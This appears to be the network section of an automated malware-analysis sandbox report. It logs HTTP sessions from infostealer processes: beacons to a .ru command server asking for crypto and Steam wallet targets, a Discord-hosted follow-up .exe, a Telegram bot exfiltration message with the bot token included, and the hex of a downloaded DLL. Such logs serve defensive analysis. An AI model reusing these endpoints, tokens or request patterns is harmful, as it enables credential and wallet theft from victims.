2023-11-18 09:03:24 UTC	10694	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eXhZhYsFidn7PeNpbELC5kxfY8RvrR2t%2F8V9LWPlUI4sTq0bPWXtN8YcSDm31SqAmuK9ZD%2Blsvb1cQ8ty9ZLlBfU5vqyJ0DeHesl%2B41MReQh8xaSMH0kTlgrXAkanbGtGHEHsDBa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a420e82c4d7-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:24 UTC	10695	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
65	192.168.2.4	49839	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:24 UTC	10694	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:25 UTC	10696	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=F5E8w%2B8TxMOc%2FYPiqK%2FrcoRCOFFNBftPN8eGtG%2BzIBxhki6yKhr3rYMY4pmc2f2dDGxUJ5pjK1yqokrz5nKZjPzHaalVpicxkCwXLwjGyTvRtLk6pyHP%2FJXQ%2B3%2FgbhiGpNkET9RS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a455fa2c490-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:25 UTC	10696	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:25 UTC	10696	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
65	104.21.89.193	443	192.168.2.4	49839	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:24 UTC	10694	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:25 UTC	10696	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=F5E8w%2B8TxMOc%2FYPiqK%2FrcoRCOFFNBftPN8eGtG%2BzIBxhki6yKhr3rYMY4pmc2f2dDGxUJ5pjK1yqokrz5nKZjPzHaalVpicxkCwXLwjGyTvRtLk6pyHP%2FJXQ%2B3%2FgbhiGpNkET9RS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a455fa2c490-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:25 UTC	10696	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:25 UTC	10696	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
66	192.168.2.4	49841	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:25 UTC	10695	OUT	GET /getwallet.php?id=1444&wallet=dash HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:25 UTC	10696	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Xh%2BsX2fkR%2BAGlMO2xgEeYp8e%2FCAZc1aqa02KXzVj51ksQXCfSN2uTxujjX2Yix1bULAYFtMV%2FIon6f1NTBLEL2zOWGUnO25VAlI6DAOfVM4bXTZ8c52rtMrcFVmrtWoXP8HXOfVN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a488a5eec02-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:25 UTC	10697	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
66	104.21.89.193	443	192.168.2.4	49841	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:25 UTC	10695	OUT	GET /getwallet.php?id=1444&wallet=dash HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:25 UTC	10696	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Xh%2BsX2fkR%2BAGlMO2xgEeYp8e%2FCAZc1aqa02KXzVj51ksQXCfSN2uTxujjX2Yix1bULAYFtMV%2FIon6f1NTBLEL2zOWGUnO25VAlI6DAOfVM4bXTZ8c52rtMrcFVmrtWoXP8HXOfVN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a488a5eec02-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:25 UTC	10697	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
67	192.168.2.4	49840	149.154.167.220	443	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:25 UTC	10695	OUT	GET /bot6786903508:AAEZrDI4W66M87X4qZRWEVE0zphCeKtMSXc/sendMessage?chat_id=6516807978&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E813848%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.14Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F52.86.18.77%3A8080%2Fget%2F3YxUsT%2F42asb_user%40813848_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F52.86.18.77%3A8080%2Fget%2F3YxUsT%2F42asb_user%40813848_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2023-11-18 09:03:26 UTC	10697	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 18 Nov 2023 09:03:25 GMT Content-Type: application/json Content-Length: 1124 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2023-11-18 09:03:26 UTC	10697	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 32 30 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 36 39 30 33 35 30 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 57 68 69 74 65 53 6e 61 6b 65 20 4c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 57 53 5f 62 63 64 63 65 66 30 66 61 62 36 64 37 35 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 35 31 36 38 30 37 39 37 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 20 4e 6f 20 4f 6e 65 20 49 6e 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6c 65 74 6e 6f 6f 6e 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 30 30 32 39 38 32 30 35 2c Data Ascii: {"ok":true,"result":{"message_id":2208,"from":{"id":6786903508,"is_bot":true,"first_name":"WhiteSnake Logs","username":"WS_bcdcef0fab6d75_bot"},"chat":{"id":6516807978,"first_name":"Let No One In","username":"letnoone","type":"private"},"date":1700298205,

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
67	149.154.167.220	443	192.168.2.4	49840	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:25 UTC	10695	OUT	GET /bot6786903508:AAEZrDI4W66M87X4qZRWEVE0zphCeKtMSXc/sendMessage?chat_id=6516807978&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E813848%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.14Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F52.86.18.77%3A8080%2Fget%2F3YxUsT%2F42asb_user%40813848_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F52.86.18.77%3A8080%2Fget%2F3YxUsT%2F42asb_user%40813848_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2023-11-18 09:03:26 UTC	10697	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 18 Nov 2023 09:03:25 GMT Content-Type: application/json Content-Length: 1124 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2023-11-18 09:03:26 UTC	10697	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 32 30 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 36 39 30 33 35 30 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 57 68 69 74 65 53 6e 61 6b 65 20 4c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 57 53 5f 62 63 64 63 65 66 30 66 61 62 36 64 37 35 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 35 31 36 38 30 37 39 37 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 20 4e 6f 20 4f 6e 65 20 49 6e 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6c 65 74 6e 6f 6f 6e 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 30 30 32 39 38 32 30 35 2c Data Ascii: {"ok":true,"result":{"message_id":2208,"from":{"id":6786903508,"is_bot":true,"first_name":"WhiteSnake Logs","username":"WS_bcdcef0fab6d75_bot"},"chat":{"id":6516807978,"first_name":"Let No One In","username":"letnoone","type":"private"},"date":1700298205,

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
68	192.168.2.4	49842	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:25 UTC	10697	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:26 UTC	10698	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=g%2B5Re7%2FOV6sC5AJuYomRcC%2FJtVdu8C%2FOAnzPKWj5Vtfqw0KsoVMyN3HBqO%2F%2B%2BcL8hSRMlAnRk7kzpswb6DwZgM5%2BMvUzFLJUj1djlvXwn00NtgLr8Fqk6q1jPy2nOOtPmPzZXxSA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a4bfbe00907-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:26 UTC	10699	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:26 UTC	10699	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
68	104.21.89.193	443	192.168.2.4	49842	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:25 UTC	10697	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:26 UTC	10698	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=g%2B5Re7%2FOV6sC5AJuYomRcC%2FJtVdu8C%2FOAnzPKWj5Vtfqw0KsoVMyN3HBqO%2F%2B%2BcL8hSRMlAnRk7kzpswb6DwZgM5%2BMvUzFLJUj1djlvXwn00NtgLr8Fqk6q1jPy2nOOtPmPzZXxSA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a4bfbe00907-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:26 UTC	10699	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:26 UTC	10699	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
69	192.168.2.4	49843	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:26 UTC	10698	OUT	GET /getwallet.php?id=1444&wallet=steam HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:26 UTC	10699	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=I2LspJjMZtPdAbT07PNqfo%2Fp9zXR0m6LYr3kvAjXyqd28bIgm1u80x0yL3R9yUt%2FyqJ8I0o2i3C5GxFryl0A8Nb7wY4wIZxtqtH1%2Bq9SBDr94fgQ%2B7E4kf%2FVxa8sLjMYctKzD36E"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a4dfc9c27fb-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:26 UTC	10700	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
69	104.21.89.193	443	192.168.2.4	49843	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:26 UTC	10698	OUT	GET /getwallet.php?id=1444&wallet=steam HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:26 UTC	10699	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=I2LspJjMZtPdAbT07PNqfo%2Fp9zXR0m6LYr3kvAjXyqd28bIgm1u80x0yL3R9yUt%2FyqJ8I0o2i3C5GxFryl0A8Nb7wY4wIZxtqtH1%2Bq9SBDr94fgQ%2B7E4kf%2FVxa8sLjMYctKzD36E"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0a4dfc9c27fb-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:26 UTC	10700	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	104.21.89.193	443	192.168.2.4	49749	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:38 UTC	793	OUT	GET /dlls/x86/SQLite.Interop.dll HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:02:38 UTC	797	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:38 GMT Content-Type: application/x-msdos-program Content-Length: 1374512 Connection: close Last-Modified: Tue, 02 Nov 2021 17:47:02 GMT ETag: "14f930-5cfd1e1811180" Accept-Ranges: bytes CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yskcQRyegIRP%2BQnU9wdGdsQZcgle%2FD4HOI6F2OkDQX9HNYDHc1C7ZKulM07XMNLvDoyimgPgsG6%2B2WRh9ng%2BXnKk5aMeELbKhemUbb5n68QHyd2X1uMKhsXwWMdrI0diqLCcEM%2Bj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09230855ec4c-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:38 UTC	798	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a b2 68 a3 de d3 06 f0 de d3 06 f0 de d3 06 f0 6a 4f f7 f0 ef d3 06 f0 6a 4f f5 f0 5e d3 06 f0 6a 4f f4 f0 f9 d3 06 f0 e5 8d 05 f1 c9 d3 06 f0 e5 8d 03 f1 c8 d3 06 f0 e5 8d 02 f1 d1 d3 06 f0 03 2c cd f0 d6 d3 06 f0 c0 81 95 f0 dd d3 06 f0 de d3 07 f0 46 d3 06 f0 49 8d 0e f1 df d3 06 f0 49 8d 06 f1 df d3 06 f0 4c 8d f9 f0 df d3 06 f0 49 8d 04 f1 df d3 06 f0 52 69 63 68 de d3 06 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$hjOjO^jO,FIILIRich
2023-11-18 09:02:38 UTC	798	IN	Data Raw: 72 63 00 00 00 94 08 00 00 00 60 14 00 00 0a 00 00 00 24 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 89 00 00 00 70 14 00 00 8a 00 00 00 2e 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: rc`$@@.relochp.@B
2023-11-18 09:02:38 UTC	800	IN	Data Raw: 10 00 0f 95 c0 0f b6 c0 50 e8 17 01 00 00 59 5d c2 0c 00 6a 10 68 70 dd 13 10 e8 65 08 00 00 6a 00 e8 06 04 00 00 59 84 c0 75 07 33 c0 e9 e0 00 00 00 e8 f8 02 00 00 88 45 e3 b3 01 88 5d e7 83 65 fc 00 83 3d 30 3a 14 10 00 74 07 6a 07 e8 ab 06 00 00 c7 05 30 3a 14 10 01 00 00 00 e8 2d 03 00 00 84 c0 74 65 e8 b6 07 00 00 68 58 1c 00 10 e8 91 05 00 00 e8 43 06 00 00 c7 04 24 d5 1a 00 10 e8 80 05 00 00 e8 50 06 00 00 c7 04 24 60 82 11 10 68 4c 82 11 10 e8 e8 56 00 00 59 59 85 c0 75 29 e8 bd 02 00 00 84 c0 74 20 68 48 82 11 10 68 44 82 11 10 e8 6e 56 00 00 59 59 c7 05 30 3a 14 10 02 00 00 00 32 db 88 5d e7 c7 45 fc fe ff ff ff e8 44 00 00 00 84 db 0f 85 4c ff ff ff e8 14 06 00 00 8b f0 83 3e 00 74 1e 56 e8 0b 04 00 00 59 84 c0 74 13 ff 75 0c 6a 02 ff 75 08 8b Data Ascii: PY]jhpejYu3E]e=0:tj0:-tehXC$P$`hLVYYu)t hHhDnVYY0:2]EDL>tVYtuju
2023-11-18 09:02:38 UTC	801	IN	Data Raw: fe ff ff ff b0 01 eb 1f 8b 45 ec 8b 00 33 c9 81 38 05 00 00 c0 0f 94 c1 8b c1 c3 8b 65 e8 c7 45 fc fe ff ff ff 32 c0 e8 45 03 00 00 c3 55 8b ec e8 ef 04 00 00 85 c0 74 0f 80 7d 08 00 75 09 33 c0 b9 34 3a 14 10 87 01 5d c3 55 8b ec 80 3d 50 3a 14 10 00 74 06 80 7d 0c 00 75 12 ff 75 08 e8 cb 60 00 00 ff 75 08 e8 74 0d 00 00 59 59 b0 01 5d c3 55 8b ec a1 04 10 14 10 8b c8 33 05 38 3a 14 10 83 e1 1f ff 75 08 d3 c8 83 f8 ff 75 07 e8 ee 5e 00 00 eb 0b 68 38 3a 14 10 e8 52 5f 00 00 59 f7 d8 59 1b c0 f7 d0 23 45 08 5d c3 55 8b ec ff 75 08 e8 ba ff ff ff f7 d8 59 1b c0 f7 d8 48 5d c3 55 8b ec 83 ec 14 83 65 f4 00 83 65 f8 00 a1 04 10 14 10 56 57 bf 4e e6 40 bb be 00 00 ff ff 3b c7 74 0d 85 c6 74 09 f7 d0 a3 00 10 14 10 eb 66 8d 45 f4 50 ff 15 28 81 11 10 8b 45 f8 Data Ascii: E38eE2EUt}u34:]U=P:t}uu`utYY]U38:uu^h8:R_YY#E]UuYH]UeeVWN@;ttfEP(E
2023-11-18 09:02:38 UTC	802	IN	Data Raw: 00 00 83 f9 20 0f 82 d2 04 00 00 81 f9 80 00 00 00 73 13 0f ba 25 10 10 14 10 01 0f 82 8e 04 00 00 e9 e3 01 00 00 0f ba 25 70 3a 14 10 01 73 09 f3 a4 8b 44 24 0c 5e 5f c3 8b c7 33 c6 a9 0f 00 00 00 75 0e 0f ba 25 10 10 14 10 01 0f 82 e0 03 00 00 0f ba 25 70 3a 14 10 00 0f 83 a9 01 00 00 f7 c7 03 00 00 00 0f 85 9d 01 00 00 f7 c6 03 00 00 00 0f 85 ac 01 00 00 0f ba e7 02 73 0d 8b 06 83 e9 04 8d 76 04 89 07 8d 7f 04 0f ba e7 03 73 11 f3 0f 7e 0e 83 e9 08 8d 76 08 66 0f d6 0f 8d 7f 08 f7 c6 07 00 00 00 74 65 0f ba e6 03 0f 83 b4 00 00 00 66 0f 6f 4e f4 8d 76 f4 8b ff 66 0f 6f 5e 10 83 e9 30 66 0f 6f 46 20 66 0f 6f 6e 30 8d 76 30 83 f9 30 66 0f 6f d3 66 0f 3a 0f d9 0c 66 0f 7f 1f 66 0f 6f e0 66 0f 3a 0f c2 0c 66 0f 7f 47 10 66 0f 6f cd 66 0f 3a 0f ec 0c 66 0f Data Ascii: s%%p:sD$^_3u%%p:svs~vftefoNvfo^0foF fon0v00fof:ffof:fGfof:f
2023-11-18 09:02:38 UTC	804	IN	Data Raw: cc cc cc cc cc cc cc cc cc 55 8b ec 57 83 3d 6c 3a 14 10 01 0f 82 fd 00 00 00 8b 7d 08 77 77 0f b6 55 0c 8b c2 c1 e2 08 0b d0 66 0f 6e da f2 0f 70 db 00 0f 16 db b9 0f 00 00 00 23 cf 83 c8 ff d3 e0 2b f9 33 d2 f3 0f 6f 0f 66 0f ef d2 66 0f 74 d1 66 0f 74 cb 66 0f d7 ca 23 c8 75 18 66 0f d7 c9 23 c8 0f bd c1 03 c7 85 c9 0f 45 d0 83 c8 ff 83 c7 10 eb d0 53 66 0f d7 d9 23 d8 d1 e1 33 c0 2b c1 23 c8 49 23 cb 5b 0f bd c1 03 c7 85 c9 0f 44 c2 5f c9 c3 0f b6 55 0c 85 d2 74 39 33 c0 f7 c7 0f 00 00 00 74 15 0f b6 0f 3b ca 0f 44 c7 85 c9 74 20 47 f7 c7 0f 00 00 00 75 eb 66 0f 6e c2 83 c7 10 66 0f 3a 63 47 f0 40 8d 4c 0f f0 0f 42 c1 75 ed 5f c9 c3 b8 f0 ff ff ff 23 c7 66 0f ef c0 66 0f 74 00 b9 0f 00 00 00 23 cf ba ff ff ff ff d3 e2 66 0f d7 f8 23 fa 75 14 66 0f ef Data Ascii: UW=l:}wwUfnp#+3offtftf#uf#ESf#3+#I#[D_Ut93t;Dt Gufnf:cG@LBu_#fft#f#uf
